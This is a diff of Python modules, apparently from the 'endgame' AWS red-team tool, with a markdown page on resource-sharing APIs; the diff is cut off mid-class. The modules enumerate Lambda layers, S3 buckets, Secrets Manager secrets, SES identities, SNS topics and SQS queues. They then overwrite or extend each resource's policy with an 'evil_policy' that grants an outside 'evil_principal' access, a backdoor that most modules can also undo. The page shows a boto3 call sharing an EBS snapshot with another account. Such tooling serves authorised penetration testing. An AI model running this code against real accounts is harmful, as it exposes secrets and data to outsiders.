class LambdaFunctions(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "lambda"
self.resource_type = "function"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_functions')
page_iterator = paginator.paginate()
for page in page_iterator:
functions = page["Functions"]
for function in functions:
name = function.get("FunctionName")
arn = function.get("FunctionArn")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,192 @@
import logging
import json
import boto3
from abc import ABC
import botocore
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_path_from_arn, get_account_from_arn
from endgame.shared.policy_document import PolicyDocument
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared import constants
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class LambdaLayer(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "lambda"
self.resource_type = "layer"
self.name = name.split(":")[0]
self.version = int(name.split(":")[1])
super().__init__(self.name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}:{self.version}"
@property
def arn_without_version(self) -> str:
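        # The layer permission APIs take the layer name (or version-less ARN) plus a separate
        # VersionNumber argument (see set_rbp/undo below), hence this second ARN form.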
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_layer_version_policy(LayerName=self.name, VersionNumber=self.version)
policy = json.loads(response.get("Policy"))
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.debug("The Policy does not exist. We will have to add it.")
success = True
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
success = True
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
if ":" in statement.aws_principals[0]:
account_id = get_account_from_arn(statement.aws_principals[0])
principal = f"arn:aws:iam::{account_id}:root"
elif "*" == statement.aws_principals[0]:
principal = "*"
else:
principal = statement.aws_principals[0]
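                    # Full IAM principal ARNs are collapsed to the owning account's root ARN before the
                    # add_layer_version_permission call; bare account IDs and "*" pass through unchanged.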
try:
self.client.add_layer_version_permission(
LayerName=self.arn_without_version,
VersionNumber=self.version,
StatementId=statement.sid,
Action="lambda:GetLayerVersion",
Principal=principal,
)
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
policy_document = self._get_rbp().policy_document
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = True
try:
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
self.client.remove_layer_version_permission(
LayerName=self.name,
VersionNumber=self.version,
StatementId=statement.sid,
)
success = True
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success,
evil_principal=evil_principal, victim_resource_arn=self.arn,
original_policy=self.original_policy, updated_policy=new_policy,
resource_type=self.resource_type, resource_name=self.name,
service=self.service)
return response_message
class LambdaLayers(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "lambda"
self.resource_type = "layer"
@property
def layers(self):
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_layers')
page_iterator = paginator.paginate()
for page in page_iterator:
layers = page["Layers"]
for layer in layers:
name = layer.get("LayerName")
arn = layer.get("LayerArn")
resources.append(name)
return resources
def layer_version_arns(self, layer_name):
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator('list_layer_versions')
page_iterator = paginator.paginate(
LayerName=layer_name
)
for page in page_iterator:
layers = page["LayerVersions"]
for layer in layers:
version = layer.get("Version")
layer_version_arn = layer.get("LayerVersionArn")
# name = get_resource_path_from_arn(layer_version_arn)
resources.append(layer_version_arn)
return resources
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
layers = self.layers
for layer_name in layers:
layer_arns = self.layer_version_arns(layer_name)
for arn in layer_arns:
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=layer_name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,98 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage, ResponseGetRbp
logger = logging.getLogger(__name__)
class S3Bucket(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "s3"
self.resource_type = "bucket"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:::{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
policy = constants.get_empty_policy()
try:
response = self.client.get_bucket_policy(Bucket=self.name)
policy = json.loads(response.get("Policy"))
message = "200: Successfully obtained bucket policy for %s" % self.arn
success = True
except botocore.exceptions.ClientError as error:
error_code = error.response['Error']['Code']
message = f"{error_code}: {error.response.get('Error').get('Message')} for {error.response.get('Error').get('BucketName')}"
if error.response['Error']['Code'] == "AccessDenied":
success = False
elif error.response['Error']['Code'] == "NoSuchBucketPolicy":
success = True
            else:
                # Some other error occurred; keep the empty policy and continue
                success = True
except Exception as error:
            message = str(error)
success = False
logger.debug(message)
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_bucket_policy(Bucket=self.name, Policy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class S3Buckets(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "s3"
self.resource_type = "bucket"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
response = self.client.list_buckets()
resources = []
for resource in response.get("Buckets"):
name = resource.get("Name")
arn = f"arn:aws:{self.service}:::{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources


@ -0,0 +1,94 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseMessage
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SecretsManagerSecret(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "secretsmanager"
self.resource_type = "secret"
self.region = region
self.current_account_id = current_account_id
self.name = name
super().__init__(name, self.resource_type, self.service, region, client, current_account_id)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
try:
response = self.client.get_resource_policy(SecretId=self.name)
if response.get("ResourcePolicy"):
policy = json.loads(response.get("ResourcePolicy"))
else:
policy = constants.get_empty_policy()
success = True
except botocore.exceptions.ClientError:
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_resource_policy(SecretId=self.name, ResourcePolicy=new_policy)
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class SecretsManagerSecrets(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "secretsmanager"
self.resource_type = "secret"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_secrets")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["SecretList"]
for resource in these_resources:
name = resource.get("Name")
arn = resource.get("ARN")
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,149 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SesIdentityPolicy(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.name = name
self.service = "ses"
self.resource_type = "identity"
self.region = region
self.current_account_id = current_account_id
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_resource_block=self.override_resource_block)
self.identity_policy_names = self._identity_policy_names()
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
def _identity_policy_names(self) -> list:
try:
response = self.client.list_identity_policies(Identity=self.name)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.get_identity_policies
policy_names = response.get("PolicyNames")
except botocore.exceptions.ClientError:
policy_names = []
return policy_names
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
# If you do not know the names of the policies that are attached to the identity, you can use ListIdentityPolicies
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
success = True
try:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.list_identity_policies
response = self.client.list_identity_policies(Identity=self.name)
policy_names = response.get("PolicyNames")
if policy_names:
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.get_identity_policies
response = self.client.get_identity_policies(Identity=self.name, PolicyNames=policy_names)
policies = response.get("Policies")
if constants.SID_SIGNATURE in policies:
policy = json.loads(policies.get(constants.SID_SIGNATURE))
except botocore.exceptions.ClientError:
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy = json.dumps(evil_policy)
try:
self.client.put_identity_policy(Identity=self.arn, PolicyName=constants.SID_SIGNATURE, Policy=new_policy)
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.put_identity_policy
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=evil_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.delete_identity_policy"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = {
"Version": "2012-10-17",
"Statement": []
}
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ses.html#SES.Client.delete_identity_policy
operation = "UNDO"
# Update the list of identity policies
success = True
if constants.SID_SIGNATURE in self._identity_policy_names():
if not dry_run:
try:
self.client.delete_identity_policy(
Identity=self.name,
PolicyName=constants.SID_SIGNATURE
)
message = f"200: Removed identity policy called {constants.SID_SIGNATURE} for identity {self.name}"
success = True
except botocore.exceptions.ClientError as error:
success = False
message = str(error)
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
else:
message = f"202: Dry run: will remove identity policy called {constants.SID_SIGNATURE} for identity {self.name}"
else:
message = f"404: There is no policy titled {constants.SID_SIGNATURE} attached to {self.name}"
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
class SesIdentityPolicies(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "ses"
self.resource_type = "identity"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_identities")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page["Identities"]
for resource in these_resources:
arn = f"arn:aws:ses:{self.region}:{self.current_account_id}:identity/{resource}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=resource)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,192 @@
import json
import logging
from abc import ABC
import boto3
import botocore
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_resource_string
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
# Valid SNS policy actions
# https://docs.aws.amazon.com/sns/latest/dg/sns-access-policy-language-api-permissions-reference.html#sns-valid-policy-actions
valid_sns_policy_actions = [
"sns:AddPermission",
"sns:DeleteTopic",
"sns:GetTopicAttributes",
"sns:ListSubscriptionsByTopic",
"sns:Publish",
"sns:Receive",
"sns:RemovePermission",
"sns:SetTopicAttributes",
"sns:Subscribe",
]
valid_sns_policy_actions_str = ",".join(valid_sns_policy_actions)
class SnsTopic(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.name = name
self.service = "sns"
self.region = region
self.current_account_id = current_account_id
self.resource_type = "topic"
self.override_account_id_instead_of_principal = True
self.override_action = ",".join(valid_sns_policy_actions)
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_action=self.override_action, override_resource_block=self.override_resource_block)
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.name}"
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
# When there is no policy, let's return an empty policy to avoid breaking things
policy = constants.get_empty_policy()
try:
response = self.client.get_topic_attributes(TopicArn=self.arn)
attributes = response.get("Attributes")
if attributes.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(attributes.get("Policy")).get("Statement"))
else:
policy = constants.get_empty_policy()
success = True
except self.client.exceptions.ResourceNotFoundException as error:
logger.critical(error)
success = False
except botocore.exceptions.ClientError as error:
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
self.client.add_permission(
TopicArn=self.arn,
Label=statement.sid,
ActionName=self.sns_actions_without_prefixes(statement.actions),
AWSAccountId=statement.aws_principals,
)
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
get_rbp_response = self._get_rbp()
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=get_rbp_response.policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
try:
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
response = self.client.remove_permission(
TopicArn=self.arn,
Label=statement.sid,
)
message = f"200: Removed backdoor statement from the resource policy attached to {self.arn}"
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
success = True
except botocore.exceptions.ClientError as error:
success = False
logger.critical(f"Operation was not successful for {self.service} {self.resource_type} "
f"{self.name}. %s" % error)
response_message = ResponseMessage(message=message, operation=operation, success=success, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def sns_actions_without_prefixes(self, actions_with_service_prefix):
# SNS boto3 client requires that you provide Publish instead of sns:Publish
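# For example (illustrative), ["sns:Publish", "sns:Subscribe"] becomes ["Publish", "Subscribe"],
# and a wildcard "sns:*" expands to every valid SNS policy action, also without the prefix.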
updated_actions = []
if isinstance(actions_with_service_prefix, list):
actions = actions_with_service_prefix
else:
actions = [actions_with_service_prefix]
for action in actions:
if ":" in action:
temp_action = action.split(":")[1]
if temp_action == "*":
# add_permission needs action names without the "sns:" prefix, so strip it from the expanded list too
updated_actions.extend([valid_action.split(":")[1] for valid_action in valid_sns_policy_actions])
else:
updated_actions.append(temp_action)
else:
updated_actions.append(action)
return updated_actions
class SnsTopics(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "sns"
self.resource_type = "topic"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
these_resources = []
paginator = self.client.get_paginator('list_topics')
page_iterator = paginator.paginate()
for page in page_iterator:
resources = page["Topics"]
for resource in resources:
arn = resource.get("TopicArn")
name = get_resource_string(arn)
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name)
these_resources.append(list_resources_response)
return these_resources

View File

@ -0,0 +1,187 @@
import logging
import json
import boto3
import botocore
from abc import ABC
from botocore.exceptions import ClientError
from policy_sentry.util.arns import get_account_from_arn
from endgame.shared import constants
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
from endgame.shared.policy_document import PolicyDocument
from endgame.shared.utils import get_sid_names_with_error_handling
from endgame.shared.response_message import ResponseMessage
from endgame.shared.list_resources_response import ListResourcesResponse
from endgame.shared.response_message import ResponseGetRbp
logger = logging.getLogger(__name__)
class SqsQueue(ResourceType, ABC):
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
self.service = "sqs"
self.resource_type = "queue"
self.region = region
self.current_account_id = current_account_id
self.name = name
self.override_account_id_instead_of_principal = True
self.override_resource_block = self.arn
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
# override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
override_resource_block=self.override_resource_block)
self.queue_url = self._queue_url()
@property
def arn(self) -> str:
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.name}"
def _queue_url(self) -> str:
response = self.client.get_queue_url(
QueueName=self.name,
QueueOwnerAWSAccountId=self.current_account_id
)
return response.get("QueueUrl")
def _get_rbp(self) -> ResponseGetRbp:
"""Get the resource based policy for this resource and store it"""
logger.debug("Getting resource policy for %s" % self.arn)
queue_url = self._queue_url()
policy = constants.get_empty_policy()
try:
response = self.client.get_queue_attributes(QueueUrl=queue_url, AttributeNames=["All"])
# response = self.client.get_queue_attributes(QueueUrl=queue_url, AttributeNames=["Policy"])
attributes = response.get("Attributes")
if attributes.get("Policy"):
policy = constants.get_empty_policy()
policy["Statement"].extend(json.loads(attributes.get("Policy")).get("Statement"))
success = True
except botocore.exceptions.ClientError as error:
# When there is no policy, let's return an empty policy to avoid breaking things
logger.critical(error)
success = False
policy_document = PolicyDocument(
policy=policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
response = ResponseGetRbp(policy_document=policy_document, success=success)
return response
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
logger.debug("Setting resource policy for %s" % self.arn)
new_policy_document = PolicyDocument(
policy=evil_policy,
service=self.service,
override_action=self.override_action,
include_resource_block=self.include_resource_block,
override_resource_block=self.override_resource_block,
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
)
new_policy_json = {
"Version": "2012-10-17",
"Statement": []
}
current_sids = get_sid_names_with_error_handling(self.original_policy)
try:
for statement in new_policy_document.statements:
if statement.sid not in current_sids:
account_ids = []
for principal in statement.aws_principals:
if ":" in principal:
account_ids.append(get_account_from_arn(principal))
self.client.add_permission(
QueueUrl=self.queue_url,
Label=statement.sid,
AWSAccountIds=account_ids,
Actions=self.sqs_actions_without_prefixes(statement.actions)
)
else:
new_policy_json["Statement"].append(json.loads(statement.__str__()))
message = "success"
success = True
except botocore.exceptions.ClientError as error:
message = str(error)
success = False
get_rbp_response = self._get_rbp()
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=get_rbp_response.policy_document.json, resource_type=self.resource_type,
resource_name=self.name, service=self.service)
return response_message
def undo(self, evil_principal: str, dry_run: bool = False) -> ResponseMessage:
"""Wraps client.remove_permission"""
logger.debug(f"Removing {evil_principal} from {self.arn}")
new_policy = constants.get_empty_policy()
operation = "UNDO"
message = "404: No backdoor statement found"
success = False
for statement in self.policy_document.statements:
if statement.sid == constants.SID_SIGNATURE:
if not dry_run:
# TODO: Error handling for setting policy
self.client.remove_permission(
QueueUrl=self.queue_url,
Label=statement.sid,
)
message = f"200: Removed backdoor statement from the resource policy attached to {self.arn}"
success = True
break
else:
new_policy["Statement"].append(json.loads(statement.__str__()))
response_message = ResponseMessage(message=message, operation=operation, evil_principal=evil_principal,
victim_resource_arn=self.arn, original_policy=self.original_policy,
updated_policy=new_policy, resource_type=self.resource_type,
resource_name=self.name, service=self.service, success=success)
return response_message
def sqs_actions_without_prefixes(self, actions_with_service_prefix):
# SQS boto3 client requires that you provide SendMessage instead of sqs:SendMessage
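# For example (illustrative), ["sqs:SendMessage", "sqs:ReceiveMessage"] becomes ["SendMessage", "ReceiveMessage"],
# and a wildcard "sqs:*" is passed through as "*", which the SQS AddPermission API accepts.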
updated_actions = []
if isinstance(actions_with_service_prefix, list):
actions = actions_with_service_prefix
else:
actions = [actions_with_service_prefix]
for action in actions:
if ":" in action:
temp_action = action.split(":")[1]
if temp_action == "*":
updated_actions.append("*")
else:
updated_actions.append(temp_action)
else:
updated_actions.append(action)
return updated_actions
class SqsQueues(ResourceTypes):
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
super().__init__(client, current_account_id, region)
self.service = "sqs"
self.resource_type = "queue"
@property
def resources(self) -> [ListResourcesResponse]:
"""Get a list of these resources"""
resources = []
paginator = self.client.get_paginator("list_queues")
page_iterator = paginator.paginate()
for page in page_iterator:
these_resources = page.get("QueueUrls")
if these_resources:
for resource in these_resources:
# queue URL takes the format:
# "https://{REGION_ENDPOINT}/queue.|api-domain|/{YOUR_ACCOUNT_NUMBER}/{YOUR_QUEUE_NAME}"
# Let's split it according to /, and the name is the last item on the list
queue_url = resource
name = queue_url.split("/")[-1]
arn = f"arn:aws:sqs:{self.region}:{self.current_account_id}:{name}"
list_resources_response = ListResourcesResponse(
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
resource_type=self.resource_type, name=name, note=queue_url)
resources.append(list_resources_response)
return resources

View File

@ -0,0 +1,30 @@
# Resources that can be made public through sharing APIs
## Support Status
### AMI
Actions:
- ec2 [modify-image-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-image-attribute.html)
### EBS snapshot
Actions:
- ec2 [modify-snapshot-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-snapshot-attribute.html)
- [moto modify_snapshot_attribute](https://github.com/spulec/moto/blob/master/moto/ec2/responses/elastic_block_store.py#L129)
- [moto describe_snapshot_attribute](https://github.com/spulec/moto/blob/master/moto/ec2/responses/elastic_block_store.py#L122)
### RDS snapshot
Actions:
- rds [modify-db-snapshot-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/modify-db-snapshot-attribute.html)
- [CLI to share a snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html#USER_ShareSnapshot.Sharing)
## Not supported (yet)
### FPGA image
Actions:
- ec2 [modify-fpga-image-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-fpga-image-attribute.html)
### RDS DB Cluster snapshot
Actions:
- rds [modify-db-cluster-snapshot-attribute](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/modify-db-cluster-snapshot-attribute.html)
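
For illustration, the sharing APIs above all follow the same pattern: modify an attribute on the resource to grant another account (or the `all` group) access, then read the attribute back to confirm. The sketch below does this for an EBS snapshot with boto3; the snapshot ID and account ID are placeholders.

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Grant another account permission to create volumes from the snapshot
ec2.modify_snapshot_attribute(
    SnapshotId="snap-0123456789abcdef0",  # placeholder snapshot ID
    Attribute="createVolumePermission",
    OperationType="add",
    UserIds=["111122223333"],  # placeholder account ID
)

# Read the attribute back to confirm who the snapshot is shared with
response = ec2.describe_snapshot_attribute(
    SnapshotId="snap-0123456789abcdef0",
    Attribute="createVolumePermission",
)
print(response.get("CreateVolumePermissions"))
```

Undoing the exposure is the same call with `OperationType="remove"`.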

View File

@ -0,0 +1,97 @@
import copy
from abc import ABCMeta, abstractmethod
import boto3
import botocore
from botocore.exceptions import ClientError
class ResponseGetSharingApi:
def __init__(
self,
